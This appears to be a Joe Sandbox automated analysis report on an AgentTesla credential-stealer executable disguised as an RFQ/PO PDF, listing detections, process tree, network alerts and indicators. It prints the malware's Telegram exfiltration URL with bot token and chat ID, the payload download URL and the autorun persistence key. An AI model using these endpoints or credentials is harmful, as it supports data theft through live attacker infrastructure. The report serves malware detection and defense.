Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ__PO_PO 24090041-PDF____PDF.exe

Overview

General Information

Sample name:RFQ__PO_PO 24090041-PDF____PDF.exe
Analysis ID:1525395
MD5:bfea25f0cbf64304aaa2c361805d5e51
SHA1:700796263c71c76607cbbd74678b0b084d7bdb7c
SHA256:0870d9107c380e8a94587e7924b1230d146ea21c6bbc7b9731bff408204ab8d0
Tags:exeuser-threatcat_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Telegram RAT
.NET source code contains potential unpacker
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • RFQ__PO_PO 24090041-PDF____PDF.exe (PID: 6204 cmdline: "C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe" MD5: BFEA25F0CBF64304AAA2C361805D5E51)
    • InstallUtil.exe (PID: 4008 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Afoagcjtqvi.exe (PID: 6192 cmdline: "C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe" MD5: BFEA25F0CBF64304AAA2C361805D5E51)
    • InstallUtil.exe (PID: 344 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Afoagcjtqvi.exe (PID: 824 cmdline: "C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe" MD5: BFEA25F0CBF64304AAA2C361805D5E51)
    • InstallUtil.exe (PID: 7012 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendMessage?chat_id=1673719962"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000008.00000002.2973425919.00000000027FE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000002.00000002.1912263833.0000000004242000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000002.1912263833.0000000004242000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000002.00000002.1912263833.0000000004242000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            00000003.00000002.1970737045.000000000258E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 64 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.6030000.8.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                      0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.raw.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                      • 0x332ce:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                      • 0x33340:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                      • 0x333ca:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                      • 0x3345c:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                      • 0x334c6:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                      • 0x33538:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                      • 0x335ce:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                      • 0x3365e:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                      Click to see the 30 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe, ProcessId: 6204, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Afoagcjtqvi

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-04T06:22:07.724812+020028517791Malware Command and Control Activity Detected192.168.2.449731149.154.167.220443TCP
                      2024-10-04T06:22:21.257844+020028517791Malware Command and Control Activity Detected192.168.2.449734149.154.167.220443TCP
                      2024-10-04T06:22:29.093614+020028517791Malware Command and Control Activity Detected192.168.2.449741149.154.167.220443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-04T06:22:07.724812+020028528151Malware Command and Control Activity Detected192.168.2.449731149.154.167.220443TCP
                      2024-10-04T06:22:21.257844+020028528151Malware Command and Control Activity Detected192.168.2.449734149.154.167.220443TCP
                      2024-10-04T06:22:29.093614+020028528151Malware Command and Control Activity Detected192.168.2.449741149.154.167.220443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-04T06:22:07.725111+020028542811A Network Trojan was detected149.154.167.220443192.168.2.449731TCP
                      2024-10-04T06:22:21.258483+020028542811A Network Trojan was detected149.154.167.220443192.168.2.449734TCP
                      2024-10-04T06:22:29.093972+020028542811A Network Trojan was detected149.154.167.220443192.168.2.449741TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exeAvira: detected
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeAvira: detection malicious, Label: HEUR/AGEN.1310836
                      Found malware configuration
                      Source: 2.2.Afoagcjtqvi.exe.4256f68.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendMessage?chat_id=1673719962"}
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe.6204.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendMessage"}
                      Multi AV Scanner detection for domain / URL
                      Source: wymascensores.comVirustotal: Detection: 11%Perma Link
                      Source: https://wymascensores.com/rigasin/Chody.mp3Virustotal: Detection: 9%Perma Link
                      Source: https://wymascensores.com/rigasin/Chody.mp31PDOh7YFOr1sSh4Virustotal: Detection: 9%Perma Link
                      Source: https://wymascensores.comVirustotal: Detection: 6%Perma Link
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeReversingLabs: Detection: 34%
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeVirustotal: Detection: 25%Perma Link
                      Multi AV Scanner detection for submitted file
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exeReversingLabs: Detection: 34%
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exeVirustotal: Detection: 25%Perma Link
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exeJoe Sandbox ML: detected
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.4:49730 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49734 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.4:49740 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49741 version: TLS 1.2
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1766602300.00000000062A0000.00000004.08000000.00040000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1887638572.000000000367A000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1912263833.00000000041B6000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1912263833.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1968221144.00000000031C7000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1766602300.00000000062A0000.00000004.08000000.00040000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1887638572.000000000367A000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1912263833.00000000041B6000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1912263833.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1968221144.00000000031C7000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1765774518.0000000005F60000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1765774518.0000000005F60000.00000004.08000000.00040000.00000000.sdmp
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_05EE05E8
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_05EE05DD
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 4x nop then mov eax, dword ptr [ebp-30h]0_2_05EE1161
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_061F07D8
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_061F07D0
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 4x nop then jmp 06213A76h0_2_062136E0
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 4x nop then jmp 06213A76h0_2_062136D6
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 4x nop then jmp 0621C010h0_2_0621BF50
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 4x nop then jmp 0621C010h0_2_0621BF58
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 4x nop then jmp 0621441Fh0_2_06214210
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 4x nop then jmp 0621441Fh0_2_06214240
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h2_2_064305DD
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h2_2_064305E8
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 4x nop then mov eax, dword ptr [ebp-30h]2_2_06431161
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h2_2_067407D0
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h2_2_067407D8
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 4x nop then jmp 06763A76h2_2_067636E0
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 4x nop then jmp 06763A76h2_2_067636DF
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 4x nop then jmp 0676C010h2_2_0676BF50
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 4x nop then jmp 0676C010h2_2_0676BF58
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 4x nop then jmp 0676441Fh2_2_06764240
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h7_2_05EB05E8
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h7_2_05EB05DD
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 4x nop then mov eax, dword ptr [ebp-30h]7_2_05EB1161
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h7_2_061C07D8
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h7_2_061C07D0
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 4x nop then jmp 061E3A76h7_2_061E36D6
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 4x nop then jmp 061E3A76h7_2_061E36E0
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 4x nop then jmp 061EC010h7_2_061EBF58
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 4x nop then jmp 061EC010h7_2_061EBF50
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 4x nop then jmp 061E441Fh7_2_061E4210
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 4x nop then jmp 061E441Fh7_2_061E4240

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49731 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49731 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49734 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.4:49731
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49734 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.4:49734
                      Source: Network trafficSuricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49741 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49741 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.4:49741
                      Uses the Telegram API (likely for C&C communication)
                      Source: unknownDNS query: name: api.telegram.org
                      Yara detected Generic Downloader
                      Source: Yara matchFile source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3d35080.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3ce6860.1.raw.unpack, type: UNPACKEDPE
                      Source: global trafficHTTP traffic detected: GET /rigasin/Chody.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dce40a9347ac6cHost: api.telegram.orgContent-Length: 915Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /rigasin/Chody.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dce40a9b442453Host: api.telegram.orgContent-Length: 915Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /rigasin/Chody.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dce40a9fdbe5e2Host: api.telegram.orgContent-Length: 915Expect: 100-continueConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewIP Address: 67.212.175.162 67.212.175.162
                      Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /rigasin/Chody.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /rigasin/Chody.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /rigasin/Chody.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: wymascensores.com
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: unknownHTTP traffic detected: POST /bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dce40a9347ac6cHost: api.telegram.orgContent-Length: 915Expect: 100-continueConnection: Keep-Alive
                      Source: InstallUtil.exe, 00000001.00000002.1890943123.00000000025E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1970737045.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2973425919.000000000281A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1890943123.00000000025D6000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1887638572.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1970737045.0000000002596000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1968221144.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2973425919.0000000002806000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1886274961.0000000000602000.00000040.00000400.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1912263833.0000000004242000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1887638572.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1912263833.00000000042F1000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1995281539.0000000003E70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: InstallUtil.exe, 00000001.00000002.1890943123.00000000025D6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1970737045.0000000002596000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2973425919.0000000002806000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1886274961.0000000000602000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1890943123.0000000002581000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1912263833.0000000004242000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1887638572.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1912263833.00000000042F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1970737045.000000000254C000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1995281539.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2973425919.00000000027BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/
                      Source: InstallUtil.exe, 00000001.00000002.1890943123.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1970737045.0000000002592000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2973425919.0000000002802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocument
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1765774518.0000000005F60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1765774518.0000000005F60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1765774518.0000000005F60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1765774518.0000000005F60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002C17000.00000004.00000800.00020000.00000000.sdmp, RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1765774518.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1887638572.0000000003138000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1765774518.0000000005F60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
